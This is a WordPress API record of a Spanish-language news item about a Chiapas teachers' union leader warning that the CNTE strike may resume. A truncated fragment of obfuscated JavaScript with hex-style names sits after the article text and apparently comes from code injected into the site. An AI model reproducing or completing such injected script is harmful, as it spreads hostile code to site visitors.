{"id":22687,"date":"2025-06-27T03:18:07","date_gmt":"2025-06-27T03:18:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22687"},"modified":"2025-06-27T03:18:08","modified_gmt":"2025-06-27T03:18:08","slug":"cnte-podria-reactivar-paro-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22687","title":{"rendered":"CNTE podr\u00eda reactivar paro laboral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000192169.jpg\" alt=\"\" class=\"wp-image-22688\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000192169.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000192169-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>26 de junio del 2025. Tuxtla Guti\u00e9rrez.- El secretario general de la Secci\u00f3n 7 de la CNTE-SNTE Isael Gonz\u00e1lez dio a conocer que, a pesar de que hubo acuerdos positivos con el gobierno federal no descartan la posibilidad de reiniciar el paro laboral.<\/p>\n\n\n\n<p>El dirigente magisterial dijo que se acordaron mecanismos para atender deudas hist\u00f3ricas con el magisterio chiapaneco, sin embargo, la exigencia de abrogar las reformas educativas contin\u00faa.<\/p>\n\n\n\n<p>Dijo que se revis\u00f3 el paquete econ\u00f3mico adeudado a los docentes por los gobiernos estatal y federal.<\/p>\n\n\n\n<p>Adelant\u00f3 que funcionarios se trasladar\u00e1 a Chiapas el pr\u00f3ximo lunes y martes para analizar tres temas cr\u00edticos: el avance en convocatorias bilaterales, la definici\u00f3n de la estructura ocupacional y el faltante de plazas en todos los niveles educativos.<\/p>\n\n\n\n<p>Tambi\u00e9n se llevar\u00e1 a cabo la reuni\u00f3n tripartita con el Instituto de Servicios Educativos (ISE) el 7 de julio, donde se exigir\u00e1 la presencia de su director general.<\/p>\n\n\n\n<p>\u201cSe plante\u00f3 una cita directa con la presidenta Claudia Sheinbaum, no solo con su gabinete, para abordar las demandas con los titulares de las secretar\u00edas involucradas\u201d.<\/p>\n\n\n\n<p>Pese a los acuerdos, Gonz\u00e1lez V\u00e1zquez calific\u00f3 como &#8220;insuficientes&#8221; los decretos recientes del Ejecutivo federal, pues &#8220;no resuelven las demandas centrales&#8221;.<\/p>\n\n\n\n<p>Exigi\u00f3 la abrogaci\u00f3n total de la Ley de 2007 la cual fue promulgada en el gobierno de Felipe Calder\u00f3n y de la reforma educativa, anunciando que la huelga nacional se reactivar\u00e1.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 26 de junio del 2025. Tuxtla Guti\u00e9rrez.- El secretario general de la Secci\u00f3n 7 de la CNTE-SNTE Isael Gonz\u00e1lez dio a conocer que, a pesar de que hubo acuerdos positivos con el gobierno federal no descartan la posibilidad de reiniciar el paro laboral. El dirigente magisterial dijo que se acordaron mecanismos para atender &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22688,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22687","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22687","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22687"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22687\/revisions"}],"predecessor-version":[{"id":22689,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22687\/revisions\/22689"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22688"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22687"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22687"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22687"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}